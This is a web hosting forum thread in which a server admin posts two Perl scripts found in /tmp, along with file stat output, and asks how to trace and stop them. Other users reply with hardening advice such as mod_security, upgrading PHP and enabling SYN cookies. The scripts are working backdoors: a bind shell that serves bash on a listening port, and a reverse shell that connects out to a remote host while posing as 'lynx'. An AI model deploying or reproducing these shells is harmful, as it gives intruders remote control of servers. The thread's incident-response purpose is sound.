bandwidth to the roof: suspicious files in tmp

[Secret Agent]

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}



filename: /tmp/bdpl


root@server2 [~]# stat /tmp/bdpl
File: `/tmp/bdpl'
Size: 612 Blocks: 8 IO Block: 4096 regular file
Device: 700h/1792d Inode: 1242 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 99/ nobody) Gid: ( 99/ nobody)
Access: 2006-02-07 16:26:35.000000000 -0600
Modify: 2006-02-02 13:26:10.000000000 -0600
Change: 2006-02-02 13:26:10.000000000 -0600


root@server2 [~]# grep bdpl /usr/local/apache/domlogs/*
-bash: /bin/grep: Argument list too long



#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

file name: /tmp/back


root@server2 [/tmp]# stat /tmp/back
File: `/tmp/back'
Size: 541 Blocks: 8 IO Block: 4096 regular file
Device: 700h/1792d Inode: 415 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 99/ nobody) Gid: ( 99/ nobody)
Access: 2006-02-07 16:30:55.000000000 -0600
Modify: 2006-02-03 12:13:14.000000000 -0600
Change: 2006-02-03 12:13:14.000000000 -0600

root@server2 [/tmp]# grep back /usr/local/apache/domlogs/*
-bash: /bin/grep: Argument list too long


Bandwidth spike screenshot attached

How do I trace this and stop it? I do have iptraf installed also

Specs:
Centos 4.2
Cpanel 10.x
PHP 4.4.2
Apache 1.33
Suexec enabled

Some security measures to name a few:

APF
BFD
LSM
SIM
MOD_DOSEVASIVE
RKHUNTER
CHKROOTKIT
SECURED TMP

[elliotcooper]

The file is almost certainly a DOS script that has been dumped into /tmp and or /var/tmp by a badly coded php script. You should kill all the processes as they are chewing up your bandwidth and making someone elses life hard as well.

If you grep your logs for any wget's or inclusions from some free site providers, geocities.com s seems to be popular choice, and you will probably find the user responsible for the script script that is being hijacked.

The easiest meathod to avoid this is to implement mod_sec as with the default rule set as this will screen most of the malicious URL's before they can dump these files into your /tmp and /var/tmp.

[aromal]

If your server doesnt host any php applications which uses zend optimizer then you can install hardened php on your server which can prevent many vulnerabilities in the existing php code.

If you are running any version <= 4.3.11 make sure you upgrade to the latest version 4.4.2 as the older versions are very vulnerable to attacks.

Also enable mod_security on the server and add rules which can prevent sql injection, cross scripting and buffer overflow attacks.

Also check if SYN cookies are enabled on the server to guard against ddos.

cat /proc/sys/net/ipv4/tcp_syncookies

It should show 1, if not you can use sysctl to enable it.

[chirpy]

Please don't dig up old threads.